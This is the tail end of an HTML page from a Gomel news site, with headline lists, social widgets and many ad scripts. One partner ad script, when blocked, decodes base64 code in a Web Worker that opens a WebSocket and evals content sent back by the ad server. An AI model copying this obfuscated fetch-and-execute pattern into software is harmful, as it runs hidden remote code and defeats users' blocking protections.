						<div class="most_read most_comment article_comment"><h4>Самое читаемое</h4><ul class="list-unstyled"><li ><div class="pull-left"> 14.11<br>2018</div><p><a href="/kalinkovichi-176/" title="Жертвы первого снега? Под Калинковичами в результате ДТП погибли пять человек - фотофакт (обновлено)">Жертвы первого снега? Под Калинковичами в результате ДТП погибли пять человек - фотофакт (обновлено)</a></p></li><li ><div class="pull-left"> 13.11<br>2018</div><p><a href="/rus/news/world-3786/" title="Сначала избили, затем сорвали одежду: дознавательница из Уфы описала, что с ней сделали начальники">Сначала избили, затем сорвали одежду: дознавательница из Уфы описала, что с ней сделали начальники</a></p></li><li ><div class="pull-left"> 16.11<br>2018</div><p><a href="/rus/news/world-3812/" title="Вечер в хату. Как «подмосковного Отелло», отрубившего руки жене, встретят в колонии">Вечер в хату. Как «подмосковного Отелло», отрубившего руки жене, встретят в колонии</a></p></li><li ><div class="pull-left"> 15.11<br>2018</div><p><a href="/kalinkovichi-178/" title="У всех погибших остались дети. Микроавтобус, вылетевший под молоковоз под Калинковичами, вез женщин на рынок">У всех погибших остались дети. Микроавтобус, вылетевший под молоковоз под Калинковичами, вез женщин на рынок</a></p></li><li ><div class="pull-left"> 13.11<br>2018</div><p><a href="/rus/news/gomel-11132/" title="Назначен первый заместитель председателя Гомельского облисполкома">Назначен первый заместитель председателя Гомельского облисполкома</a></p></li><li ><div class="pull-left"> 18.11<br>2018</div><p><a href="/rus/news/gomel-11180/" title="В гомельском гипермаркете мужчине не пробили товар по стоимости, указанной на ценнике. Что делать, если на ценнике одна сумма, а в чеке другая?">В гомельском гипермаркете мужчине не пробили товар по стоимости, указанной на ценнике. Что делать, если на ценнике одна сумма, а в чеке другая?</a></p></li><li ><div class="pull-left"> 15.11<br>2018</div><p><a href="/rus/news/belarus-8620/" title="В Волгограде монтажник-высотник из Гомеля погиб из-за звонка на мобильный">В Волгограде монтажник-высотник из Гомеля погиб из-за звонка на мобильный</a></p></li></ul></div>						<!-- Баннер горсобраний -->
						<br><br>
						<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
						<ins class="adsbygoogle"
							 style="display:block"
							 data-ad-client="ca-pub-4199418862563420"
							 data-ad-slot="4341639388"
							 data-ad-format="auto"></ins>
						<script>
						(adsbygoogle = window.adsbygoogle || []).push({});
						</script>
						
					</div>
				</div>
				<div style="margin:10px 0;" class="container">
	
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=537" class="banner_max_width"><img style="width:100%" src="/modules/media/files/pizzman-1-______-1130__200.jpg" alt="ДОСТАВКА 19/11 - 19/11: " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=537" class="banner_middle_width"><img style="width:100%" src="/modules/media/files/pizzman-1-______-1130__200.jpg" alt="ДОСТАВКА 19/11 - 19/11: " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=537" class="banner_small_width"><img style="width:100%" src="/modules/media/files/pizzman-1-______-1130__200.jpg" alt="ДОСТАВКА 19/11 - 19/11: " border="0" /></a>
				</div>

				
				<!-- Партнеры --><div class="list-news">
	<h2>Новости партнеров</h2>
	<div id="M357979ScriptRootC673119" style="margin-top: -50px !important;">
			<div id="M357979PreloadC673119">
			Загрузка...    </div>
			<script>
					(function(){
				var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById',lp=d.location.protocol,wp=lp.indexOf('http')==0?lp:'https:';
				var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M357979ScriptRootC673119")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
				catch(e){var iw=d;var c=d[gi]("M357979ScriptRootC673119");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=673119;c[ac](dv);
				var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src=wp+"//jsc.lentainform.com/g/o/gomel.today.673119.js?t="+D.getYear()+D.getMonth()+D.getUTCDate()+D.getUTCHours();c[ac](s);})();
			</script>
	</div>
</div>

<br><br>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Блок под партнерами -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-4199418862563420"
     data-ad-slot="7187455882"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>

<!-- Yandex.RTB R-A-150149-27 
<div id="yandex_rtb_R-A-150149-27"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-150149-27",
                renderTo: "yandex_rtb_R-A-150149-27",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script> -->
				
				<aside class="list-news news-last">
	<h2>последние Новости</h2>
	<div class="row">
		<div class="col col-md-4">
	<img src="/uploads/News/2018/11/19/123-kamen.jpg" class="img-responsive">
	<ul class="list-inline small-desc">
		<li class="date">19 ноября 2018</li>
		<li class="view"><i class="sprite sview"></i> 69</li>
		<li class="comment"><i class="sprite scomment"></i> 0</li>
	</ul>
	<h3><a href="/rus/news/belarus-8653/">За два дня собрали деньги на 100 тонн камней. Как белорусы помогают реконструировать Кревский замок</a></h3>
	<p>
		Белорусы за&nbsp;два дня собрали деньги на&nbsp;100 тонн камней для Кревского замка. Об&nbsp;этом сообщил на&nbsp;своей странице на&nbsp;Facebook журналист и&nbsp;краевед Глеб Лободенко.... 
	</p>
</div><div class="col col-md-4">
	<img src="/uploads/News/2018/11/19/122-belorus.jpg" class="img-responsive">
	<ul class="list-inline small-desc">
		<li class="date">19 ноября 2018</li>
		<li class="view"><i class="sprite sview"></i> 88</li>
		<li class="comment"><i class="sprite scomment"></i> 0</li>
	</ul>
	<h3><a href="/rus/article/society-950/">Выросли или отчаялись, или Кому (не)верят белорусы</a></h3>
	<p>
		Недавний опрос, проведенный Исследовательским центром ИПМ, показал, что за&nbsp;10&nbsp;лет граждане Беларуси стали большими сторонниками рыночной экономики, чем социализма. Другими словами, они стали... 
	</p>
</div><div class="col col-md-4">
	<img src="/uploads/News/2018/11/19/121-most.jpg" class="img-responsive">
	<ul class="list-inline small-desc">
		<li class="date">19 ноября 2018</li>
		<li class="view"><i class="sprite sview"></i> 150</li>
		<li class="comment"><i class="sprite scomment"></i> 0</li>
	</ul>
	<h3><a href="/zhitkovichi-159/">В Житковичском районе построят мост из Ленина в Новый Ленин</a></h3>
	<p>
		В&nbsp;Житковичском районе завершено строительство еще одного моста. Он&nbsp;возведен над рекой Случ между агрогородком Ленин и&nbsp;деревней Новый Ленин.... 
	</p>
</div><div class="col col-md-4">
	<img src="/uploads/News/2018/11/19/316-kalifornia.jpg" class="img-responsive">
	<ul class="list-inline small-desc">
		<li class="date">19 ноября 2018</li>
		<li class="view"><i class="sprite sview"></i> 100</li>
		<li class="comment"><i class="sprite scomment"></i> 0</li>
	</ul>
	<h3><a href="/rus/news/world-3826/">Пожары в Калифорнии: почему пропало без вести так много людей</a></h3>
	<p>
		За&nbsp;последние несколько дней число людей, которых внесли в&nbsp;список пропавших без вести в&nbsp;результате пожаров в&nbsp;северной части штата Калифорния, возросло до&nbsp;более чем 1200&nbsp;че... 
	</p>
</div><div class="col col-md-4">
	<img src="/uploads/News/2018/11/19/315-blood.jpg" class="img-responsive">
	<ul class="list-inline small-desc">
		<li class="date">19 ноября 2018</li>
		<li class="view"><i class="sprite sview"></i> 208</li>
		<li class="comment"><i class="sprite scomment"></i> 0</li>
	</ul>
	<h3><a href="/rus/news/belarus-8652/">Курьезная «заказуха» в Витебске: жертва скрутил киллера и вызвал милицию</a></h3>
	<p>
		Жительница Витебска наняла киллера из&nbsp;российского Саратова, чтобы убить своего гражданского мужа, но&nbsp;тот с&nbsp;заданием не&nbsp;справился.... 
	</p>
</div><div class="col col-md-4">
	<img src="/uploads/News/2018/11/19/508-torgovlia.jpg" class="img-responsive">
	<ul class="list-inline small-desc">
		<li class="date">19 ноября 2018</li>
		<li class="view"><i class="sprite sview"></i> 270</li>
		<li class="comment"><i class="sprite scomment"></i> 0</li>
	</ul>
	<h3><a href="/rus/news/belarus-8650/">В Беларуси существенно переписали правила для торговли и общепита. Что изменилось для покупателей</a></h3>
	<p>
		В&nbsp;Беларуси изменили правила продажи отдельных товаров и&nbsp;работы общепита. Так, магазины должны будут указывать цены в&nbsp;литрах и&nbsp;килограммах, а&nbsp;также продавать товары по&nbsp;цен... 
	</p>
</div>		
	</div>
</aside>
				
				<!-- Redtrum --><div class="list-news">
	<h2>Новости партнеров</h2>
<script class="r20422" type="text/javascript">
    (function() {
        var worker20422,
            tickerID = 20422,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r20422'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's20422');
            script.setAttribute('data-idn', idn);
            script.src = '//js-goods.redtram.com/0/20/ticker_20422.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker20422.postMessage(data);
                }

                worker20422 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker20422.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker20422.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
</div>
<br><br>
<!-- <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-4199418862563420"
     data-ad-slot="7187455882"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script> -->


<!-- Yandex.RTB R-A-150149-28 -->
<div id="yandex_rtb_R-A-150149-28"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-150149-28",
                renderTo: "yandex_rtb_R-A-150149-28",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script> 
			</div>
		</main>
		
		<aside class="social">
			<div class="container text-center">
				<h4>Мы в социальных сетях, присоединяйся</h4>

				<div class="row">
					<div class="col-md-4">
<script type="text/javascript" src="//vk.com/js/api/openapi.js?136"></script>
<!-- VK Widget -->
<div id="vk_groups"></div>
<script type="text/javascript">
	VK.Widgets.Group("vk_groups", {mode: 0, width: "auto", height: "420"}, 44883411);
</script>
					</div>
					<div class="col-md-4">
<div id="ok_group_widget"></div>
<script>
!function (d, id, did, st) {
  var js = d.createElement("script");
  js.src = "https://connect.ok.ru/connect.js";
  js.onload = js.onreadystatechange = function () {
  if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") {
    if (!this.executed) {
      this.executed = true;
      setTimeout(function () {
        OK.CONNECT.insertGroupWidget(id,did,st);
      }, 0);
    }
  }}
  d.documentElement.appendChild(js);
}(document,"ok_group_widget","51704289099929",'{"width":360,"height":420}');
</script>
					</div>
					<div class="col-md-4">
<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/ru_RU/sdk.js#xfbml=1&version=v2.8&appId=128720990534159";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script><div class="fb-page" data-href="https://www.facebook.com/GomelToday/" data-tabs="timeline" data-height="420" data-small-header="false" data-adapt-container-width="true" data-hide-cover="false" data-show-facepile="true"><blockquote cite="https://www.facebook.com/GomelToday/" class="fb-xfbml-parse-ignore"><a href="https://www.facebook.com/GomelToday/">Гомель - Сильные Новости</a></blockquote></div>
					</div>
				</div>
			</div>
		</aside>

	<footer>
		<div class="container">
			<div class="row">
				<div class="col col-md-1 col-sm-6 col-xs-1"><!--LiveInternet logo--><a href="//www.liveinternet.ru/click"
								target="_blank"><img src="//counter.yadro.ru/logo?18.1"
								title="LiveInternet: показано число просмотров за 24 часа, посетителей за 24 часа и за сегодня"
								alt="" border="0" width="88" height="31"/></a><!--/LiveInternet-->
					<p style="display:inline-block; font-size:20px; color:white; padding:10px; border: 2px solid white; margin-top:30px;">14+</p>
				</div>
				<div class="col col-md-8 col-sm-6 col-xs-12">
						<strong>&copy; 2017 Сильные Новости - Гомель сегодня</strong><br>
						Перепечатка материалов сайта и использование информации допускается только при указании прямой активной индексируемой гиперссылки, а также имени и фамилии автора (авторов) материала.
				</div>
				<div class="col col-md-3 col-sm-6 col-xs-12 text-right">
						<ul class="list-unstyled">
							<li><a href="/ad/" target="_blank" class="btn btn-info">Заказать рекламу</a><br><br></li>
							<li class="email">Связь с редакцией:<br><i class="sprite semail"></i>gomel.today@gmail.com</li>
						</ul>
				</div>
			</div>
		</div>
	</footer>		
		<div id='admixer_1a57c481e6b64964a46d5043ae76cce1_zone_9085_sect_2479_site_2247'></div> <script type='text/javascript'> admixerML.fn.push(function() { admixerML.display('admixer_1a57c481e6b64964a46d5043ae76cce1_zone_9085_sect_2479_site_2247'); }); </script>
		<div id='admixer_033d7154161a4441b055d3711546beb5_zone_9086_sect_2479_site_2247'></div> <script type='text/javascript'> admixerML.fn.push(function() { admixerML.display('admixer_033d7154161a4441b055d3711546beb5_zone_9086_sect_2479_site_2247'); }); </script>
		<div id='admixer_9f9fc002852a4c97a9cbd1b8419260ec_zone_25912_sect_8001_site_2247'></div> <script type='text/javascript'> admixerML.fn.push(function() {
admixerML.display('admixer_9f9fc002852a4c97a9cbd1b8419260ec_zone_25912_sect_8001_site_2247'); }); </script>
	<!-- Google Analytics -->
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-96780669-1', 'auto');
  ga('send', 'pageview');
</script>
		<div class="button-up"></div>
		
		<!-- Яндекс №4 -->
		<script type="text/javascript">
    		(function(w, d, n, s, t) {
       			 w[n] = w[n] || [];
       			 w[n].push(function() {
          			  Ya.Context.AdvManager.render({
               		  blockId: "R-A-150149-20",
             			   renderTo: "yandex_rtb_R-A-150149-20",
           					async: true
          			  });
       			 });
        		t = d.getElementsByTagName("script")[0];
       			 s = d.createElement("script");
       			 s.type = "text/javascript";
      			  s.src = "//an.yandex.ru/system/context.js";
       			 s.async = true;
       			 t.parentNode.insertBefore(s, t);
    		})(this, this.document, "yandexContextAsyncCallbacks");
</script>
		
		<div id="adriver_banner_1306727653"></div>
<script type="text/javascript">
new adriver("adriver_banner_1306727653", {sid:211499, bt:52});
</script>
		<!--  AdRiver code START. Type:AjaxJS Site: СН PZ:2 BN:13 -->
		<div id="adriver_banner_2126930171" class="adriverBanner"></div>
		<script type="text/javascript">
			new adriver("adriver_banner_2126930171", {sid:211499, bt:52, bn:13, pz:2});
		</script>
		<!--  AdRiver code END  -->
		
	</body>
</html>
